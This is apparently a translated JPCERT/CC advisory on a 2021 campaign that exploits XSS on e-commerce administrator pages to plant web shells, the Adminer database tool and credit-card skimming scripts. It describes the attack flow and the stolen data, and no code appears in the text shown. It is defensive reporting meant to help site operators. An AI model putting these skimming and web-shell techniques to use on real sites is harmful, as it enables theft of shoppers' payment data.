Attack Exploiting XSS Vulnerability in E-commerce Websites
On 28 April 2021, Trend Micro reported the details of attacks exploiting cross-site scripting (hereafter “XSS”) vulnerability on e-commerce websites . JPCERT/CC has also confirmed similar cases, which originate in XSS vulnerability in websites developed with EC-CUBE products (an open source CMS for e-commerce websites). This attack does not target vulnerabilities which is specific to EC-CUBE products but affects any e-commerce websites which have XSS vulnerability on its administrator page. This attack campaign is still ongoing as of July 1, 2021. This article details the cases that JPCERT/CC has handled.
The flow of the attack is described in Figure 1.
Files embedded in e-commerce sites in the course of this attack are listed in Table 1.
|WebShell||・Multi-function WebShell (based in Chinese. Tool name unknown)|
|Database control tool||
・Adminer version 4.2.4
・Send credit card information etc. when clicked・Loaded on login/transaction page
|Information storage file||
・Store credit card number, expiry date, security code, email address, password etc.
|Simple WebShell||・Execute PHP file uploaded|
In the course of action, attackers embed Adminer  on the e-commerce website. This is a common tool to check database contents on a GUI environment, which is compatible with various types of database such as MySQL, PostgreSQL, SQLite, MS SQL, Oracle, SimpleDB, Elasticsearch, MongoDB. Attackers are likely to have stolen database information by using this tool.
Malicious purchase action exploiting XSS vulnerability
An XSS attack is performed as a part of purchase process with the following malicious script. Attackers send this script into multiple forms in order to increase the chance of success.
Stealing credit card information
Figure 4 describes the flow of attack stealing credit card information of the site visitor.
It is assumed that attackers retrieved the credit card information stored in the “information storage file” via WebShell.
Attackers check the URL and hooks the user’s mouse clicks to steal the information provided in each component. In the collected data, the path name related to credit card transaction services of the e-commerce company is hard-coded. This indicates that the attackers customise code depending on the target e-commerce company.
WebShell that was likely used to steal information
The control page of the WebShell is displayed in Figure 8. It comes with various functions such as file download/upload and shell command execution. This WebShell is written in Chinese language.
We have introduced the attack details stealing credentials from administrator’s page. Even if an e-commerce site itself has no security issues, this attack can be carried out if a plugin is vulnerable. Therefore, it is recommended to check for updates for plugins as well. Please refer to JPCERT/CC’s security alerts ,  and an advisory  regarding the vulnerabilities exploited.
For your information, IP address, domain names and file hash values identified in the attack are listed in Appendix A and B.
- Yuma Masubuchi, Shusei Tomonaga
(Translated by Yukako Uchida)
Appendix A: Attackers’ IP address and domains
Appendix B: SHA256 hash values of files used in the attack
Note: These hash values include tools which may also be used in daily operation. Beware of false detection when using this as an indicator of compromise.
- Database control tool